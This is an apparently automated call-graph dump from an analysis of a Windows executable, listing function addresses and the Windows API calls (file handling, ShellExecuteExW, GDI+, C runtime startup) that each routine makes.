22862->22848 22863->22850 22864->22861 22865->22797 22866->22806 22867->22801 22868->22804 22882 40a8e0 22869->22882 22877 40c66d __vswprintf_c_l 22872->22877 22873 40c7b7 22874 40c7df 22873->22874 22885 40c5f7 22873->22885 22876 40f8f2 2 API calls 22874->22876 22879 40c7ae 22876->22879 22877->22873 22877->22879 22889 40a791 85 API calls 22877->22889 22890 4177e7 93 API calls 22877->22890 22879->22821 22881->22821 22883 40a8f4 GetVersionExW 22882->22883 22884 407c70 22882->22884 22883->22884 22884->22815 22886 40c600 22885->22886 22888 40c651 22885->22888 22887 410680 PeekMessageW GetMessageW TranslateMessage DispatchMessageW SendDlgItemMessageW 22886->22887 22886->22888 22887->22888 22888->22874 22889->22877 22890->22877 22892 40fca2 22891->22892 22893 40fc39 EnterCriticalSection 22891->22893 22892->22825 22897 40fc57 22893->22897 22899 40fc75 22893->22899 22894 40f9d1 77 API calls 22896 40fc8f 22894->22896 22895 40fc98 LeaveCriticalSection 22895->22892 22896->22895 22897->22899 22900 40f9d1 22897->22900 22899->22894 22899->22895 22901 40fdc9 72 API calls 22900->22901 22902 40f9f3 ReleaseSemaphore 22901->22902 22903 40fa31 DeleteCriticalSection CloseHandle CloseHandle 22902->22903 22904 40fa13 22902->22904 22903->22899 22905 40fac7 70 API calls 22904->22905 22906 40fa1d CloseHandle 22905->22906 22906->22903 22906->22904 22907->22834 22908->22834 22924 4121e6 22909->22924 22911 40c658 115 API calls 22916 415995 ___BuildCatchObject __vswprintf_c_l 22911->22916 22912 415d67 22942 413ef1 92 API calls __vswprintf_c_l 22912->22942 22914 415d77 __vswprintf_c_l 22914->22843 22916->22911 22916->22912 22928 40fa67 22916->22928 22934 412b3a 115 API calls 22916->22934 22935 415db9 115 API calls 22916->22935 22936 40fdc9 22916->22936 22940 412593 92 API calls __vswprintf_c_l 22916->22940 22941 4163f2 120 API calls __vswprintf_c_l 22916->22941 22922->22843 22923->22843 22926 4121f0 ___std_exception_copy __EH_prolog ___scrt_get_show_window_mode 22924->22926 22925 4122db 22925->22916 22926->22925 22927 406e0b 68 API calls 22926->22927 22927->22926 22929 40fa73 22928->22929 22932 40fa78 22928->22932 22930 40fbb1 77 API calls 22929->22930 22930->22932 22931 40fa91 22931->22916 22932->22931 22933 40fdc9 72 API calls 22932->22933 22933->22931 22934->22916 22935->22916 22937 40fde3 ResetEvent ReleaseSemaphore 22936->22937 22938 40fe0e 22936->22938 22939 40fac7 70 API calls 22937->22939 22938->22916 22939->22938 22940->22916 22941->22916 22942->22914 22943->22576 22944->22576 22945->22573 22947 405da6 22946->22947 22996 405cc5 22947->22996 22950 405dd9 22951 405e1a 22950->22951 22952 405e11 22950->22952 23001 40a950 CharUpperW CompareStringW CompareStringW 22950->23001 22951->22952 23002 40f0e1 CompareStringW 22951->23002 22952->22588 22955 408116 22954->22955 22956 4081b7 CharUpperW 22955->22956 22957 4081ca 22956->22957 22957->22591 22959 407c20 22958->22959 22960 407c60 22959->22960 23008 406f49 67 API calls 22959->23008 22960->22598 22962 407c58 23009 406d0d 67 API calls 22962->23009 23010 409897 22964->23010 22967 409888 22967->22628 22970 409a23 22969->22970 22973 409a32 22969->22973 22971 409a29 FlushFileBuffers 22970->22971 22970->22973 22971->22973 22972 409aab SetFileTime 22972->22655 22973->22972 22974->22580 22975->22582 22976->22611 22977->22598 22978->22598 22979->22596 22980->22613 22981->22605 22982->22613 22984 409720 22983->22984 22985 409723 GetFileType 22983->22985 22984->22620 22986 409731 22985->22986 22986->22620 22987->22623 22988->22625 22989->22651 22990->22651 22991->22651 22992->22651 22993->22649 22994->22650 22995->22604 23003 405bc2 22996->23003 22999 405bc2 3 API calls 23000 405ce6 22999->23000 23000->22950 23001->22950 23002->22952 23005 405bcc 23003->23005 23004 405cb4 23004->22999 23004->23000 23005->23004 23007 40a950 CharUpperW CompareStringW CompareStringW 23005->23007 23007->23005 23008->22962 23009->22960 23011 40987d 23010->23011 23014 4098a3 23010->23014 23011->22967 23015 409b6a SetEndOfFile 23011->23015 23012 4098da SetFilePointer 23012->23011 23013 4098f8 GetLastError 23012->23013 23013->23011 23014->23012 23015->22967 23018 40a27d 23017->23018 23019 40a29b FindFirstFileW 23018->23019 23020 40a30d FindNextFileW 23018->23020 23023 40a2b4 23019->23023 23028 40a2f1 23019->23028 23021 40a318 GetLastError 23020->23021 23022 40a32c 23020->23022 23021->23022 23022->23028 23024 40b275 2 API calls 23023->23024 23025 40a2cd 23024->23025 23026 40a2d1 FindFirstFileW 23025->23026 23027 40a2e6 GetLastError 23025->23027 23026->23027 23026->23028 23027->23028 23028->22530 23038 418adf GetDC GetDeviceCaps ReleaseDC 23029->23038 23031 418ac7 23033 418ad3 23031->23033 23039 418b22 GetDC GetDeviceCaps ReleaseDC 23031->23039 23033->22228 23033->22229 23034->22235 23035->22238 23036->22238 23037->22241 23038->23031 23039->23033 23040->22248 23042 409ba2 67 API calls 23041->23042 23043 401ee9 23042->23043 23044 4019b1 90 API calls 23043->23044 23047 401eed 23043->23047 23045 401efa 23044->23045 23045->23047 23048 406d0d 67 API calls 23045->23048 23047->22257 23047->22258 23048->23047 23834 41d553 46 API calls 6 library calls 23889 427ede 27 API calls _ValidateLocalCookies 23680 41cd5c 23681 41cd66 23680->23681 23682 41cabc ___delayLoadHelper2@8 19 API calls 23681->23682 23683 41cd73 23682->23683 23787 40605e 73 API calls 23835 41995f 104 API calls 23836 41955f 71 API calls 23837 418963 GdipDisposeImage GdipFree ___InternalCxxFrameHandler 23890 421f60 RtlUnwind 23789 401067 75 API calls pre_c_initialization 23719 41b077 23721 41b07c 23719->23721 23733 41aa99 _wcsrchr 23719->23733 23720 4196ec ExpandEnvironmentStringsW 23720->23733 23721->23733 23745 41b9aa 23721->23745 23723 41b642 23725 41ad86 SetWindowTextW 23725->23733 23728 4220de 22 API calls 23728->23733 23730 41ab77 SetFileAttributesW 23732 41ac32 GetFileAttributesW 23730->23732 23741 41ab6a ___scrt_get_show_window_mode 23730->23741 23734 41ac40 DeleteFileW 23732->23734 23732->23741 23733->23720 23733->23723 23733->23725 23733->23728 23736 41af50 GetDlgItem SetWindowTextW SendMessageW 23733->23736 23739 41af92 SendMessageW 23733->23739 23733->23741 23744 410b12 CompareStringW 23733->23744 23768 418b8e GetCurrentDirectoryW 23733->23768 23769 40a1a9 7 API calls 23733->23769 23772 40a132 FindClose 23733->23772 23773 419844 69 API calls ___std_exception_copy 23733->23773 23734->23741 23736->23733 23738 403f5b _swprintf 51 API calls 23740 41ac75 GetFileAttributesW 23738->23740 23739->23733 23740->23741 23742 41ac86 MoveFileW 23740->23742 23741->23730 23741->23732 23741->23733 23741->23738 23770 40b100 52 API calls 2 library calls 23741->23770 23771 40a1a9 7 API calls 23741->23771 23742->23741 23743 41ac9e MoveFileExW 23742->23743 23743->23741 23744->23733 23747 41b9b4 ___scrt_get_show_window_mode 23745->23747 23746 41bc0c 23746->23733 23747->23746 23748 41ba9f 23747->23748 23774 410b12 CompareStringW 23747->23774 23750 409dff 4 API calls 23748->23750 23751 41bab4 23750->23751 23752 41bad3 ShellExecuteExW 23751->23752 23775 40ae20 GetFullPathNameW GetFullPathNameW GetCurrentDirectoryW CharUpperW 23751->23775 23752->23746 23759 41bae6 23752->23759 23754 41bacb 23754->23752 23755 41bb21 23776 41be69 WaitForSingleObject PeekMessageW WaitForSingleObject 23755->23776 23756 41bb77 CloseHandle 23757 41bb85 23756->23757 23758 41bb90 23756->23758 23777 410b12 CompareStringW 23757->23777 23758->23746 23764 41bc07 ShowWindow 23758->23764 23759->23755 23759->23756 23761 41bb1b ShowWindow 23759->23761 23761->23755 23763 41bb39 23763->23756 23765 41bb4c GetExitCodeProcess 23763->23765 23764->23746 23765->23756 23766 41bb5f 23765->23766 23766->23756 23768->23733 23769->23733 23770->23741 23771->23741 23772->23733 23773->23733 23774->23748 23775->23754 23776->23763 23777->23758 23891 42d774 IsProcessorFeaturePresent 23892 41d779 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 23893 426f03 21 API calls 2 library calls 23861 420a00 6 API calls 4 library calls 23796 41d002 38 API calls 2 library calls 23839 423501 QueryPerformanceFrequency QueryPerformanceCounter 23894 42c301 21 API calls __vswprintf_c_l 23049 41d611 23050 41d61d ___scrt_is_nonwritable_in_current_image 23049->23050 23075 41d126 23050->23075 23052 41d624 23054 41d64d 23052->23054 23152 41da75 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_get_show_window_mode 23052->23152 23062 41d68c ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 23054->23062 23086 42572c 23054->23086 23058 41d66c ___scrt_is_nonwritable_in_current_image 23059 41d6ec 23094 41db90 23059->23094 23062->23059 23153 424760 38 API calls 3 library calls 23062->23153 23070 41d718 23072 41d721 23070->23072 23154 424b67 28 API calls _abort 23070->23154 23155 41d29d 13 API calls 2 library calls 23072->23155 23076 41d12f 23075->23076 23156 41d8cb IsProcessorFeaturePresent 23076->23156 23078 41d13b 23157 420b66 23078->23157 23080 41d140 23081 41d144 23080->23081 23166 4255b9 23080->23166 23081->23052 23084 41d15b 23084->23052 23089 425743 23086->23089 23087 41d783 _ValidateLocalCookies 5 API calls 23088 41d666 23087->23088 23088->23058 23090 4256d0 23088->23090 23089->23087 23091 4256ff 23090->23091 23092 41d783 _ValidateLocalCookies 5 API calls 23091->23092 23093 425728 23092->23093 23093->23062 23279 41dea0 23094->23279 23096 41dba3 GetStartupInfoW 23097 41d6f2 23096->23097 23098 42567d 23097->23098 23281 428558 23098->23281 23100 425686 23101 41d6fb 23100->23101 23285 4288e3 38 API calls 23100->23285 23103 41c131 23101->23103 23406 40f353 23103->23406 23107 41c150 23455 419036 23107->23455 23109 41c159 23459 410722 GetCPInfo 23109->23459 23111 41c163 ___scrt_get_show_window_mode 23112 41c176 GetCommandLineW 23111->23112 23113 41c203 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 23112->23113 23114 41c185 23112->23114 23115 403f5b _swprintf 51 API calls 23113->23115 23462 41a8d4 23114->23462 23117 41c26c SetEnvironmentVariableW GetModuleHandleW LoadIconW 23115->23117 23475 419a76 LoadBitmapW 23117->23475 23120 41c193 OpenFileMappingW 23124 41c1f3 CloseHandle 23120->23124 23125 41c1ac MapViewOfFile 23120->23125 23121 41c1fd 23469 41be0a 23121->23469 23124->23113 23127 41c1ea UnmapViewOfFile 23125->23127 23128 41c1bd __vswprintf_c_l 23125->23128 23127->23124 23129 41be0a 2 API calls 23128->23129 23131 41c1d9 23129->23131 23130 41c2b3 23132 41c2c5 DialogBoxParamW 23130->23132 23131->23127 23133 41c2ff 23132->23133 23134 41c311 Sleep 23133->23134 23135 41c318 23133->23135 23134->23135 23138 41c326 23135->23138 23500 419237 CompareStringW SetCurrentDirectoryW ___scrt_get_show_window_mode 23135->23500 23137 41c345 DeleteObject 23139 41c35c DeleteObject 23137->23139 23140 41c35f 23137->23140 23138->23137 23139->23140 23141 41c390 23140->23141 23142 41c3a2 23140->23142 23501 41be69 WaitForSingleObject PeekMessageW WaitForSingleObject 23141->23501 23498 41909e 23142->23498 23144 41c396 CloseHandle 23144->23142 23146 41c3dc 23147 424a9b GetModuleHandleW 23146->23147 23148 41d70e 23147->23148 23148->23070 23149 424bc4 23148->23149 23609 424941 23149->23609 23152->23052 23153->23059 23154->23072 23155->23058 23156->23078 23158 420b6b ___vcrt_initialize_pure_virtual_call_handler ___vcrt_initialize_winapi_thunks 23157->23158 23170 421c0e 23158->23170 23162 420b81 23163 420b8c 23162->23163 23184 421c4a DeleteCriticalSection 23162->23184 23163->23080 23165 420b79 23165->23080 23212 428ac5 23166->23212 23169 420b8f 8 API calls 3 library calls 23169->23081 23171 421c17 23170->23171 23173 421c40 23171->23173 23174 420b75 23171->23174 23185 421e85 23171->23185 23190 421c4a DeleteCriticalSection 23173->23190 23174->23165 23176 420ca6 23174->23176 23205 421d9a 23176->23205 23178 420cb0 23179 420cbb 23178->23179 23210 421e48 6 API calls try_get_function 23178->23210 23179->23162 23181 420cc9 23182 420cd6 23181->23182 23211 420cd9 6 API calls ___vcrt_FlsFree 23181->23211 23182->23162 23184->23165 23191 421c79 23185->23191 23188 421ebc InitializeCriticalSectionAndSpinCount 23189 421ea8 23188->23189 23189->23171 23190->23174 23192 421cad 23191->23192 23195 421ca9 23191->23195 23192->23188 23192->23189 23193 421ccd 23193->23192 23196 421cd9 GetProcAddress 23193->23196 23195->23192 23195->23193 23198 421d19 23195->23198 23197 421ce9 __crt_fast_encode_pointer 23196->23197 23197->23192 23199 421d41 LoadLibraryExW 23198->23199 23203 421d36 23198->23203 23200 421d75 23199->23200 23201 421d5d GetLastError 23199->23201 23200->23203 23204 421d8c FreeLibrary 23200->23204 23201->23200 23202 421d68 LoadLibraryExW 23201->23202 23202->23200 23203->23195 23204->23203 23206 421c79 try_get_function 5 API calls 23205->23206 23207 421db4 23206->23207 23208 421dcc TlsAlloc 23207->23208 23209 421dbd 23207->23209 23209->23178 23210->23181 23211->23179 23213 428ae2 23212->23213 23216 428ade 23212->23216 23213->23216 23218 4271c0 23213->23218 23214 41d783 _ValidateLocalCookies 5 API calls 23215 41d14d 23214->23215 23215->23084 23215->23169 23216->23214 23219 4271cc ___scrt_is_nonwritable_in_current_image 23218->23219 23230 4276d6 EnterCriticalSection 23219->23230 23221 4271d3 23231 428f93 23221->23231 23223 4271f1 23246 42720d LeaveCriticalSection _abort 23223->23246 23224 4271e2 23224->23223 23244 427054 29 API calls 23224->23244 23227 4271ec 23245 42710a GetStdHandle GetFileType 23227->23245 23228 427202 ___scrt_is_nonwritable_in_current_image 23228->23213 23230->23221 23232 428f9f ___scrt_is_nonwritable_in_current_image 23231->23232 23233 428fc3 23232->23233 23234 428fac 23232->23234 23247 4276d6 EnterCriticalSection 23233->23247 23255 425e3e 20 API calls _abort 23234->23255 23237 428fcf 23243 428ffb 23237->23243 23248 428ee4 23237->23248 23238 428fb1 23256 425d1d 26 API calls _abort 23238->23256 23241 428fbb ___scrt_is_nonwritable_in_current_image 23241->23224 23257 429022 LeaveCriticalSection _abort 23243->23257 23244->23227 23245->23223 23246->23228 23247->23237 23249 425a8d _abort 20 API calls 23248->23249 23250 428ef6 23249->23250 23251 428f03 23250->23251 23258 4279a7 23250->23258 23252 4259c2 _free 20 API calls 23251->23252 23254 428f55 23252->23254 23254->23237 23255->23238 23256->23241 23257->23241 23265 427735 23258->23265 23261 4279ec InitializeCriticalSectionAndSpinCount 23263 4279d7 23261->23263 23262 41d783 _ValidateLocalCookies 5 API calls 23264 427a03 23262->23264 23263->23262 23264->23250 23266 427765 23265->23266 23269 427761 23265->23269 23266->23261 23266->23263 23267 427785 23267->23266 23270 427791 GetProcAddress 23267->23270 23269->23266 23269->23267 23272 4277d1 23269->23272 23271 4277a1 __crt_fast_encode_pointer 23270->23271 23271->23266 23273 4277f2 LoadLibraryExW 23272->23273 23274 4277e7 23272->23274 23275 42780f GetLastError 23273->23275 23278 427827 23273->23278 23274->23269 23276 42781a LoadLibraryExW 23275->23276 23275->23278 23276->23278 23277 42783e FreeLibrary 23277->23274 23278->23274 23278->23277 23280 41deb7 23279->23280 23280->23096 23280->23280 23282 428561 23281->23282 23284 42856a 23281->23284 23286 428457 23282->23286 23284->23100 23285->23100 23287 42631f _abort 38 API calls 23286->23287 23288 428464 23287->23288 23306 428576 23288->23306 23290 42846c 23315 4281eb 23290->23315 23292 428483 23292->23284 23294 4259fc __vswprintf_c_l 21 API calls 23295 428494 23294->23295 23296 4284c6 23295->23296 23322 428618 23295->23322 23298 4259c2 _free 20 API calls 23296->23298 23298->23292 23300 4284c1 23332 425e3e 20 API calls _abort 23300->23332 23302 42850a 23302->23296 23333 4280c1 26 API calls 23302->23333 23303 4284de 23303->23302 23304 4259c2 _free 20 API calls 23303->23304 23304->23302 23307 428582 ___scrt_is_nonwritable_in_current_image 23306->23307 23308 42631f _abort 38 API calls 23307->23308 23313 42858c 23308->23313 23311 428610 ___scrt_is_nonwritable_in_current_image 23311->23290 23313->23311 23314 4259c2 _free 20 API calls 23313->23314 23334 425a4a 38 API calls _abort 23313->23334 23335 4276d6 EnterCriticalSection 23313->23335 23336 428607 LeaveCriticalSection _abort 23313->23336 23314->23313 23316 422636 __fassign 38 API calls 23315->23316 23317 4281fd 23316->23317 23318 42821e 23317->23318 23319 42820c GetOEMCP 23317->23319 23320 428223 GetACP 23318->23320 23321 428235 23318->23321 23319->23321 23320->23321 23321->23292 23321->23294 23323 4281eb 40 API calls 23322->23323 23324 428637 23323->23324 23327 428688 IsValidCodePage 23324->23327 23329 42863e 23324->23329 23331 4286ad ___scrt_get_show_window_mode 23324->23331 23325 41d783 _ValidateLocalCookies 5 API calls 23326 4284b9 23325->23326 23326->23300 23326->23303 23328 42869a GetCPInfo 23327->23328 23327->23329 23328->23329 23328->23331 23329->23325 23337 4282c3 GetCPInfo 23331->23337 23332->23296 23333->23296 23335->23313 23336->23313 23338 4283a7 23337->23338 23339 4282fd 23337->23339 23341 41d783 _ValidateLocalCookies 5 API calls 23338->23341 23347 4293f3 23339->23347 23343 428453 23341->23343 23343->23329 23346 4275cb __vswprintf_c_l 43 API calls 23346->23338 23348 422636 __fassign 38 API calls 23347->23348 23349 429413 MultiByteToWideChar 23348->23349 23351 4294e9 23349->23351 23352 429451 23349->23352 23353 41d783 _ValidateLocalCookies 5 API calls 23351->23353 23355 4259fc __vswprintf_c_l 21 API calls 23352->23355 23358 429472 __vswprintf_c_l ___scrt_get_show_window_mode 23352->23358 23356 42835e 23353->23356 23354 4294e3 23366 427616 20 API calls _free 23354->23366 23355->23358 23361 4275cb 23356->23361 23358->23354 23359 4294b7 MultiByteToWideChar 23358->23359 23359->23354 23360 4294d3 GetStringTypeW 23359->23360 23360->23354 23362 422636 __fassign 38 API calls 23361->23362 23363 4275de 23362->23363 23367 4273ae 23363->23367 23366->23351 23368 4273c9 __vswprintf_c_l 23367->23368 23369 4273ef MultiByteToWideChar 23368->23369 23370 4275a3 23369->23370 23371 427419 23369->23371 23372 41d783 _ValidateLocalCookies 5 API calls 23370->23372 23374 4259fc __vswprintf_c_l 21 API calls 23371->23374 23377 42743a __vswprintf_c_l 23371->23377 23373 4275b6 23372->23373 23373->23346 23374->23377 23375 427483 MultiByteToWideChar 23376 4274ef 23375->23376 23378 42749c 23375->23378 23403 427616 20 API calls _free 23376->23403 23377->23375 23377->23376 23394 427a09 23378->23394 23382 4274c6 23382->23376 23386 427a09 __vswprintf_c_l 11 API calls 23382->23386 23383 4274fe 23384 4259fc __vswprintf_c_l 21 API calls 23383->23384 23389 42751f __vswprintf_c_l 23383->23389 23384->23389 23385 427594 23402 427616 20 API calls _free 23385->23402 23386->23376 23387 427a09 __vswprintf_c_l 11 API calls 23390 427573 23387->23390 23389->23385 23389->23387 23390->23385 23391 427582 WideCharToMultiByte 23390->23391 23391->23385 23392 4275c2 23391->23392 23404 427616 20 API calls _free 23392->23404 23395 427735 _abort 5 API calls 23394->23395 23396 427a30 23395->23396 23399 427a39 23396->23399 23405 427a91 10 API calls 3 library calls 23396->23405 23398 427a79 LCMapStringW 23398->23399 23400 41d783 _ValidateLocalCookies 5 API calls 23399->23400 23401 4274b3 23400->23401 23401->23376 23401->23382 23401->23383 23402->23376 23403->23370 23404->23376 23405->23398 23407 41cec0 23406->23407 23408 40f35d GetModuleHandleW 23407->23408 23409 40f377 GetProcAddress 23408->23409 23410 40f3c8 23408->23410 23411 40f3a0 GetProcAddress 23409->23411 23412 40f390 23409->23412 23413 40f6fd GetModuleFileNameW 23410->23413 23508 42462a 42 API calls __vswprintf_c_l 23410->23508 23411->23410 23415 40f3ac 23411->23415 23412->23411 23426 40f718 23413->23426 23415->23410 23416 40f63b 23416->23413 23417 40f646 GetModuleFileNameW CreateFileW 23416->23417 23418 40f6f1 CloseHandle 23417->23418 23419 40f675 SetFilePointer 23417->23419 23418->23413 23419->23418 23420 40f685 ReadFile 23419->23420 23420->23418 23423 40f6a4 23420->23423 23421 40a8e0 GetVersionExW 23421->23426 23423->23418 23425 40f309 2 API calls 23423->23425 23424 40f74d CompareStringW 23424->23426 23425->23423 23426->23421 23426->23424 23427 40f783 GetFileAttributesW 23426->23427 23428 40f797 23426->23428 23502 40f309 23426->23502 23427->23426 23427->23428 23429 40f7a4 23428->23429 23432 40f7d6 23428->23432 23431 40f7bc GetFileAttributesW 23429->23431 23433 40f7d0 23429->23433 23430 40f8e5 23454 418b8e GetCurrentDirectoryW 23430->23454 23431->23429 23431->23433 23432->23430 23434 40a8e0 GetVersionExW 23432->23434 23433->23432 23435 40f7f0 23434->23435 23436 40f7f7 23435->23436 23437 40f85d 23435->23437 23438 40f309 2 API calls 23436->23438 23439 403f5b _swprintf 51 API calls 23437->23439 23440 40f801 23438->23440 23441 40f885 AllocConsole 23439->23441 23442 40f309 2 API calls 23440->23442 23443 40f892 GetCurrentProcessId AttachConsole 23441->23443 23444 40f8dd ExitProcess 23441->23444 23446 40f80b 23442->23446 23509 4220b3 23443->23509 23448 40d142 54 API calls 23446->23448 23447 40f8b3 GetStdHandle WriteConsoleW Sleep FreeConsole 23447->23444 23449 40f826 23448->23449 23450 403f5b _swprintf 51 API calls 23449->23450 23451 40f839 23450->23451 23452 40d142 54 API calls 23451->23452 23453 40f848 23452->23453 23453->23444 23454->23107 23456 40f309 2 API calls 23455->23456 23457 41904a OleInitialize 23456->23457 23458 41906d GdiplusStartup SHGetMalloc 23457->23458 23458->23109 23460 410746 IsDBCSLeadByte 23459->23460 23460->23460 23461 41075e 23460->23461 23461->23111 23463 41a8de 23462->23463 23464 41a926 CharUpperW 23463->23464 23465 41a9a9 CharUpperW 23463->23465 23466 41a9f4 23463->23466 23467 41a94d CharUpperW 23463->23467 23511 40dfde 73 API calls ___scrt_get_show_window_mode 23463->23511 23464->23463 23465->23463 23466->23120 23466->23121 23467->23463 23470 41cec0 23469->23470 23471 41be17 SetEnvironmentVariableW 23470->23471 23473 41be3a 23471->23473 23472 41be62 23472->23113 23473->23472 23474 41be56 SetEnvironmentVariableW 23473->23474 23474->23472 23476 419aa0 GetObjectW 23475->23476 23477 419a97 23475->23477 23479 418ac0 6 API calls 23476->23479 23512 418bd0 FindResourceW 23477->23512 23482 419ab2 23479->23482 23481 419af3 23493 40caa7 23481->23493 23482->23481 23483 419ad3 23482->23483 23485 418bd0 13 API calls 23482->23485 23528 418b22 GetDC GetDeviceCaps ReleaseDC 23483->23528 23487 419ac8 23485->23487 23486 419adb 23529 418adf GetDC GetDeviceCaps ReleaseDC 23486->23529 23487->23483 23489 419ace DeleteObject 23487->23489 23489->23483 23490 419ae4 23530 418cf3 8 API calls ___scrt_get_show_window_mode 23490->23530 23492 419aeb DeleteObject 23492->23481 23539 40cacc 23493->23539 23497 40caba 23497->23130 23499 4190c4 GdiplusShutdown CoUninitialize 23498->23499 23499->23146 23500->23138 23501->23144 23503 41cec0 23502->23503 23504 40f316 GetSystemDirectoryW 23503->23504 23505 40f34c 23504->23505 23506 40f32e 23504->23506 23505->23426 23507 40f33f LoadLibraryW 23506->23507 23507->23505 23508->23416 23510 4220bb 23509->23510 23510->23447 23510->23510 23511->23463 23513 418bf1 SizeofResource 23512->23513 23518 418c23 23512->23518 23514 418c05 LoadResource 23513->23514 23513->23518 23515 418c16 LockResource 23514->23515 23514->23518 23516 418c2a GlobalAlloc 23515->23516 23515->23518 23517 418c41 GlobalLock 23516->23517 23516->23518 23519 418cb8 GlobalFree 23517->23519 23520 418c4c __vswprintf_c_l 23517->23520 23518->23476 23519->23518 23521 418c54 CreateStreamOnHGlobal 23520->23521 23522 418cb1 GlobalUnlock 23521->23522 23523 418c6c 23521->23523 23522->23519 23531 418b65 GdipAlloc 23523->23531 23526 418c90 GdipCreateHBITMAPFromBitmap 23527 418ca6 23526->23527 23527->23522 23528->23486 23529->23490 23530->23492 23532 418b77 23531->23532 23533 418b84 23531->23533 23535 418924 23532->23535 23533->23522 23533->23526 23533->23527 23536 418945 GdipCreateBitmapFromStreamICM 23535->23536 23537 41894c GdipCreateBitmapFromStream 23535->23537 23538 418951 23536->23538 23537->23538 23538->23533 23540 40cad6 _wcschr __EH_prolog 23539->23540 23541 40cb02 GetModuleFileNameW 23540->23541 23542 40cb33 23540->23542 23543 40cb1c 23541->23543 23562 40973d 23542->23562 23543->23542 23545 409437 72 API calls 23546 40cab3 23545->23546 23558 40ce48 GetModuleHandleW FindResourceW 23546->23558 23547 4099e0 70 API calls 23551 40ccb9 ___std_exception_copy 23547->23551 23549 40cb63 23554 40cc9f 23549->23554 23557 40cce9 23549->23557 23571 409aeb 23549->23571 23579 40990d 23549->23579 23587 4099e0 23549->23587 23552 40990d 73 API calls 23551->23552 23551->23557 23555 40ccdf ___std_exception_copy 23552->23555 23554->23547 23554->23557 23555->23557 23592 4106e9 MultiByteToWideChar 23555->23592 23557->23545 23559 40ce76 23558->23559 23561 40ce70 23558->23561 23560 40c91f 52 API calls 23559->23560 23560->23561 23561->23497 23563 409747 23562->23563 23564 40979d CreateFileW 23563->23564 23565 4097ca GetLastError 23564->23565 23566 40981b 23564->23566 23567 40b275 2 API calls 23565->23567 23566->23549 23568 4097ea 23567->23568 23568->23566 23569 4097ee CreateFileW GetLastError 23568->23569 23570 409812 23569->23570 23570->23566 23572 409afe 23571->23572 23573 409b0f SetFilePointer 23571->23573 23574 409b48 23572->23574 23593 406eae 68 API calls 23572->23593 23573->23574 23575 409b2d GetLastError 23573->23575 23574->23549 23575->23574 23577 409b37 23575->23577 23577->23574 23594 406eae 68 API calls 23577->23594 23580 409924 23579->23580 23582 409985 23580->23582 23583 409977 23580->23583 23585 409987 23580->23585 23595 409613 23580->23595 23582->23549 23607 406e74 68 API calls 23583->23607 23585->23582 23586 409613 5 API calls 23585->23586 23586->23585 23588 409897 2 API calls 23587->23588 23589 4099f4 23588->23589 23590 409a0b 23589->23590 23608 406eae 68 API calls 23589->23608 23590->23549 23592->23557 23593->23573 23594->23574 23596 409621 GetStdHandle 23595->23596 23597 40962c ReadFile 23595->23597 23596->23597 23598 409645 23597->23598 23599 409665 23597->23599 23600 40971a GetFileType 23598->23600 23599->23580 23601 40964c 23600->23601 23602 40967c 23601->23602 23603 40966d GetLastError 23601->23603 23604 40965a 23601->23604 23602->23599 23606 40968c GetLastError 23602->23606 23603->23599 23603->23602 23605 409613 GetFileType 23604->23605 23605->23599 23606->23599 23606->23604 23607->23582 23608->23590 23610 42494d _abort 23609->23610 23611 424965 23610->23611 23613 424a9b _abort GetModuleHandleW 23610->23613 23631 4276d6 EnterCriticalSection 23611->23631 23614 424959 23613->23614 23614->23611 23643 424adf GetModuleHandleExW 23614->23643 23615 424a0b 23632 424a4b 23615->23632 23619 4249e2 23623 4249fa 23619->23623 23624 4256d0 _abort 5 API calls 23619->23624 23620 42496d 23620->23615 23620->23619 23651 425447 20 API calls _abort 23620->23651 23621 424a54 23652 42f149 5 API calls _ValidateLocalCookies 23621->23652 23622 424a28 23635 424a5a 23622->23635 23625 4256d0 _abort 5 API calls 23623->23625 23624->23623 23625->23615 23631->23620 23653 42771e LeaveCriticalSection 23632->23653 23634 424a24 23634->23621 23634->23622 23654 427b13 23635->23654 23638 424a88 23640 424adf _abort 8 API calls 23638->23640 23639 424a68 GetPEB 23639->23638 23641 424a78 GetCurrentProcess TerminateProcess 23639->23641 23642 424a90 ExitProcess 23640->23642 23641->23638 23644 424b09 GetProcAddress 23643->23644 23645 424b2c 23643->23645 23646 424b1e 23644->23646 23647 424b32 FreeLibrary 23645->23647 23648 424b3b 23645->23648 23646->23645 23647->23648 23649 41d783 _ValidateLocalCookies 5 API calls 23648->23649 23650 424b45 23649->23650 23650->23611 23651->23619 23653->23634 23655 427b38 23654->23655 23658 427b2e 23654->23658 23656 427735 _abort 5 API calls 23655->23656 23656->23658 23657 41d783 _ValidateLocalCookies 5 API calls 23659 424a64 23657->23659 23658->23657 23659->23638 23659->23639 23865 427216 21 API calls 23866 42ee16 CloseHandle 23802 401019 29 API calls pre_c_initialization 23803 41b820 72 API calls 23841 419123 73 API calls 23686 41c726 19 API calls ___delayLoadHelper2@8 23700 426428 23708 42784c 23700->23708 23703 42643c 23705 426444 23706 426451 23705->23706 23716 426454 11 API calls 23705->23716 23709 427735 _abort 5 API calls 23708->23709 23710 427873 23709->23710 23711 42788b TlsAlloc 23710->23711 23712 42787c 23710->23712 23711->23712 23713 41d783 _ValidateLocalCookies 5 API calls 23712->23713 23714 426432 23713->23714 23714->23703 23715 4263a3 20 API calls 2 library calls 23714->23715 23715->23705 23716->23703 23806 42f830 DeleteCriticalSection 23842 425536 8 API calls ___vcrt_uninitialize 23843 41a537 93 API calls _swprintf 23895 41d736 20 API calls 23844 410d3a 26 API calls std::bad_exception::bad_exception 21898 41c7c0 21899 41c791 21898->21899 21899->21898 21901 41cabc 21899->21901 21929 41c7ca 21901->21929 21903 41cad6 21904 41cb33 21903->21904 21915 41cb57 21903->21915 21940 41ca3a 11 API calls 3 library calls 21904->21940 21906 41cb3e RaiseException 21907 41cd2c 21906->21907 21944 41d783 21907->21944 21908 41cbcf LoadLibraryExA 21910 41cc30 21908->21910 21911 41cbe2 GetLastError 21908->21911 21914 41cc42 21910->21914 21916 41cc3b FreeLibrary 21910->21916 21917 41cbf5 21911->21917 21918 41cc0b 21911->21918 21912 41cd3b 21912->21899 21913 41cca0 GetProcAddress 21920 41ccb0 GetLastError 21913->21920 21924 41ccfe 21913->21924 21914->21913 21914->21924 21915->21908 21915->21910 21915->21914 21915->21924 21916->21914 21917->21910 21917->21918 21941 41ca3a 11 API calls 3 library calls 21918->21941 21922 41ccc3 